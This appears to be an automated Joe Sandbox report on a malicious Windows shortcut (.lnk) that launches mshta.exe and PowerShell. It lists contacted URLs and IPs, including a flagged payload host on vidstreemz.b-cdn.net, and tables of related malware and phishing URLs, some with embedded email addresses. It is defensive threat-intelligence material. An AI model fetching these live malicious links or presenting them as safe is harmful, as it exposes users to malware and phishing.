https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css?mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7852000.00000004.00000020.00020000.00000000.sdmp, unconfigured[1].css.4.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://vidstreemz.b-cdn.net/nexto...mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmptrue
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff)css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svgb(mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff)css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net(mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/pmshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-aWmshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)css[1].css.4.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svgxmshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)css[1].css.4.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svg...mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svgcss/unconfigured.cssmshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://crl.ver)svchost.exe, 00000006.00000002.2701659030.000001BD6B490000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000006.00000003.1498181186.000001BD6B320000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg7Xmshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latinDmshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://fonts.bunny.net/mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillimshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff2)mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://vidstreemz.b-cdn.net/nexto$global:?powershell.exetrue
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff2)css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://vidstreemz.b-cdn.net/nextoC:mshta.exe, 00000004.00000002.2698471609.00000271E5540000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://vidstreemz.b-cdn.net/nexto(mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff2)css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normwmshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff2)css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff2)css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff2)mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/%zmshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff)css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff)css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://vidstreemz.b-cdn.net/mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://vidstreemz.b-cdn.net/nexto;mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://bunny.net/vmshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://vidstreemz.b-cdn.net/nextoubik:300mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://bunny.net/xmshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/tmshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/lmshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff)mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff)css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://vidstreemz.b-cdn.net/nextoHmshta.exe, 00000004.00000002.2699008025.00000271E5690000.00000004.00000800.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff2)css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normalformat(mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://vidstreemz.b-cdn.net/nextoYmshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://bunny.net/Xmshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpfalse
    unknown
    https://bunny.net/Smshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://fonts.bunny.mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://bunny.net/Omshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
    • Avira URL Cloud: safe
    unknown
    https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff)css[1].css.4.drfalse
    • Avira URL Cloud: safe
    unknown
    https://bunny.net/Pmshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
    • Avira URL Cloud: safe
    unknown
    https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff)css[1].css.4.drfalse
    • Avira URL Cloud: safe
    unknown
    https://fonts.bunny.net/rubik/files/rubik-hebrew-900-normal.woff2)css[1].css.4.drfalse
    • Avira URL Cloud: safe
    unknown
    https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff)css[1].css.4.drfalse
    • Avira URL Cloud: safe
    unknown
    https://vidstreemz.b-cdn.net/nextoMmshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    https://vidstreemz.b-cdn.net/nextonAsVmshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    https://bunny.net/Lmshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      https://vidstreemz.b-cdn.net/nextoimshta.exe, 00000004.00000002.2697931791.0000008398745000.00000004.00000010.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff2)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
      • Avira URL Cloud: safe
      unknown
      https://vidstreemz.b-cdn.net/nextocmshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
      • Avira URL Cloud: safe
      unknown
      https://bunny.net/Zmshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...-mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://fonts.bunny.net/rubik/files/rubik-latin-ext-500-normal.woff)mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      169.150.236.104
      bunnyfonts.b-cdn.netUnited States
      2711SPIRITTEL-ASUSfalse
      169.150.247.39
      bunny.netUnited States
      2711SPIRITTEL-ASUSfalse
      169.150.247.36
      bunnycdn.comUnited States
      2711SPIRITTEL-ASUSfalse
      138.199.36.7
      vidstreemz.b-cdn.netEuropean Union
      51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRtrue
      169.150.247.37
      bunnycdn.b-cdn.netUnited States
      2711SPIRITTEL-ASUSfalse
      IP
      127.0.0.1
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1512349
      Start date and time:2024-09-17 09:22:07 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 38s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:12
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:8t6beMY1wO.lnk
      renamed because original name is a hash value
      Original Sample Name:4a37a2af26ce9de3b828c5a92320bbefa6e91b6f1a4ad67c4f701729c0ff92eb.lnk
      Detection:MAL
      Classification:mal84.winLNK@7/12@5/6
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .lnk
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
      • Excluded IPs from analysis (whitelisted): 184.28.90.27
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtEnumerateKey calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      03:23:10API Interceptor2x Sleep call for process: svchost.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      169.150.236.104PDp2UpMXz1.lnkGet hashmaliciousUnknownBrowse
      • fonts.bunny.net/css?family=Rubik:300,400,500,700,900
      169.150.247.39https://softworldenterprise.comGet hashmaliciousUnknownBrowse
      • cdn.rawgit.com/michalsnik/aos/2.1.1/dist/aos.js
      http://cdn.bootcdn.netGet hashmaliciousUnknownBrowse
      • cdn.bootcdn.net/
      PAYNOW_2023_08_002783pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • www.openlend.lat/aw8o/
      fjerbregners_patrol.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • www.openlend.lat/aw8o/?1NM6e=JwP18BaQn2gAMbwzAk/tzHq1rHqPkgowxzXz/N2AVg5llpqPoDBUT4Fbw9qJesVKC8w5QoNuWE8SYi183Rf2cdVRH8sDFcjA1Q==&P4=_n5TPHiTKZj
      169.150.247.36https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousUnknownBrowse
      • security1.b-cdn.net/
      https://softworldinc.wpengine.comGet hashmaliciousUnknownBrowse
      • cdn.rawgit.com/michalsnik/aos/2.1.1/dist/aos.js
      http://office365secure-thresholdacoustics-q5cdxz-my-sharepoint-com.b-cdn.netGet hashmaliciousUnknownBrowse
      • office365secure-thresholdacoustics-q5cdxz-my-sharepoint-com.b-cdn.net/favicon.ico
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      bunnycdn.com12TtMAeYOD.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.104
      eodJLLo3Px.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.105
      PDp2UpMXz1.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.39
      https://mato-camp-v1.b-cdn.net/kestyGet hashmaliciousUnknownBrowse
      • 169.150.247.38
      http://169.150.221.147Get hashmaliciousUnknownBrowse
      • 37.19.207.34
      https://rolexz.b-cdn.net/Wi0n0MntyEr00170887/index.htmlGet hashmaliciousUnknownBrowse
      • 143.244.50.89
      https://www.cognitoforms.com/Pales1/OnepdfGet hashmaliciousUnknownBrowse
      • 185.59.220.194
      bunnycdn.b-cdn.net12TtMAeYOD.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.104
      eodJLLo3Px.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.38
      PDp2UpMXz1.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.37
      https://mato-camp-v1.b-cdn.net/kestyGet hashmaliciousUnknownBrowse
      • 169.150.247.39
      http://169.150.221.147Get hashmaliciousUnknownBrowse
      • 185.152.66.243
      https://rolexz.b-cdn.net/Wi0n0MntyEr00170887/index.htmlGet hashmaliciousUnknownBrowse
      • 143.244.50.83
      https://www.cognitoforms.com/Pales1/OnepdfGet hashmaliciousUnknownBrowse
      • 89.187.165.194
      vidstreemz.b-cdn.netVideo%20HD%20%281080p%29.lnk.mal.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.40
      bunnyfonts.b-cdn.net12TtMAeYOD.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.105
      eodJLLo3Px.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.38
      PDp2UpMXz1.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.104
      https://url.uk.m.mimecastprotect.com/s/mPYbC6R8kf47GAUxtNC5T-0g?domain=tplshare.comGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.38
      https://7b14357e6ed5ac4dfd72842ddaaaed9f.ipfscdn.io/ipfs/QmenmshJ1Lkb1NoEFFwbJh7REUP2Z4SDr5eZL3JXuJLWkR#info@titlesqld.com.auGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.36
      https://ipfs.io/ipfs/QmeKeCuc6egp3ZX5SzEwqrZmh738etEgdSeQ2masEZovkQ/Get hashmaliciousUnknownBrowse
      • 169.150.247.37
      https://ipfs.io/ipfs/bafybeicqb5zaheslaimrate6trmguoxmuxic2uttieu6w3rxzd7xjjhsgm/roundcube.html#adi-websupport-uk@adiglobal.comGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.37
      http://arianarings.comGet hashmaliciousUnknownBrowse
      • 169.150.247.38
      http://url103.dignitycampaign.net/ls/click?upn=u001.Cas5ugePNtSf1mSWabrqo3mcJtdueilvOPTgzdlEpUd4GqCBNMVtW-2F-2F2wgGqCLpTN6dAfdijLlYq9iwquJXmE-2BZj79F37Z0CckED5TsG4fQ25o-2Fg-2FPDuwQBBWHkJ8RPrCF5saPUwaAjeZZiD8h-2FB9W48m4tIaN6GGErXkSFKFmDgBEYW1T7k-2FnXnvn8ldLi-2FIdfk0aRSirefRJxNUdOIGpZfncANcS7uFNatgOPxV2Ygm6fLOUWLotwEqsin4Y1CmtZ7BxfF5foNolE-2Boa25K-2B7wPI3V-2B767Ve4mOhPgJzLgSnGmthLVhWy6BYQf00QNI659fk8q12w02DBMlmMrw3khDr3cnNgYYng2Y5i7BXuipr6DyeGT98fM-2FKBVEQSrbKIquH3JWJaaXzReEynWFW3nTYFz4s5xNRnFU5AokDAcZstvVwxKq-2FJ1IjM1twMf6Hwg_J4YDns4pksLrb17hOXi2aOEwqj3m3dsJSi8gSl9zOoLhblODLjz6IKGTmKF92YKf5UEx9qOPJhvHxt6OvXPWhTIMtIICg1dYT0JxHA0xPVOIL6-2FatGunkes1VHfyRgkBTjXb0N8OIv5rbfThOrNJV8o4LJaaqlIOJB8KNeMcZLv1BO01a-2BZFPSvVNpAIaUaUnS-2BTtMnNrsqDBXNDQiQ2C60GIMOxXkEBDcUqmXWKAXHT2jyJKnE-2BTVX7Dn6v15EXXnFGV7DsBJuyOfxy4Jpp-2FDgxjoJYvwKKleeNMeZbnV7GSaFm53K3rrMP7FHypDrTj5gZolkQN74G665MiZOGOEsJpZBxGWUmRe5KD1lnqv9UsmS5oXGuT59ef-2B-2BOIJwozGuQ8LcLU9sq2bhaxr5QKojdGSLYHkQV48pY3diE-2FSKipsOxgeSp8hri35emljCrDJ8o2gvEcqTrgSbi5z9cBSKny1JK-2FAw-2B-2Bt5GdKd66pp3fqQXb-2FO03pmb7PSvgIGO-2BeUcgeDGkShCS6uwIbaWf92ZS-2BRnf-2BH4JXvcFqQFMHG6QluReLkOtpCzV5c3fz0XkA9GRQTJKj7LLrgRu3TEig-3D-3DGet hashmaliciousUnknownBrowse
      • 169.150.247.37
      https://bityl.co/Rdhj#MmpKcFFEVVI2TVllaWsyVHoxbTVjNVQ2OFJkV0I2UW53emdGdFlabWtLYlFDd3ZmMjIydmh0VVc3SEJnZUNkeG11THhoRWM4cS95OXhmejFJQXRJWlE9PQ__Get hashmaliciousPhisherBrowse
      • 169.150.247.37
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      SPIRITTEL-ASUS12TtMAeYOD.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.105
      eodJLLo3Px.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.38
      PDp2UpMXz1.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.37
      https://stackby.com/view/vwshr17265453204549a34eaGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.39
      https://vente-directe-dv.com/Get hashmaliciousUnknownBrowse
      • 169.150.247.39
      https://multichainfix.pages.dev/chunks/patternsGet hashmaliciousUnknownBrowse
      • 169.150.255.183
      https://dpdcz.info8463.com/688687481Get hashmaliciousUnknownBrowse
      • 169.150.255.180
      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bi%C2%ADwa%C2%ADnt%C2%AD2b%C2%ADea.%E2%80%8Bc%C2%ADo%C2%ADm%2Fbuilds%2Fapps%2FvwIz5pvZDUMH3brg4zO3DxEW/bmF0Get hashmaliciousHTMLPhisherBrowse
      • 169.150.255.183
      http://quantmarketfunds.orgGet hashmaliciousUnknownBrowse
      • 169.150.255.181
      Play_VM-Now(Chartering)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.36
      SPIRITTEL-ASUS12TtMAeYOD.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.105
      eodJLLo3Px.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.38
      PDp2UpMXz1.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.37
      https://stackby.com/view/vwshr17265453204549a34eaGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.39
      https://vente-directe-dv.com/Get hashmaliciousUnknownBrowse
      • 169.150.247.39
      https://multichainfix.pages.dev/chunks/patternsGet hashmaliciousUnknownBrowse
      • 169.150.255.183
      https://dpdcz.info8463.com/688687481Get hashmaliciousUnknownBrowse
      • 169.150.255.180
      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bi%C2%ADwa%C2%ADnt%C2%AD2b%C2%ADea.%E2%80%8Bc%C2%ADo%C2%ADm%2Fbuilds%2Fapps%2FvwIz5pvZDUMH3brg4zO3DxEW/bmF0Get hashmaliciousHTMLPhisherBrowse
      • 169.150.255.183
      http://quantmarketfunds.orgGet hashmaliciousUnknownBrowse
      • 169.150.255.181
      Play_VM-Now(Chartering)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.36
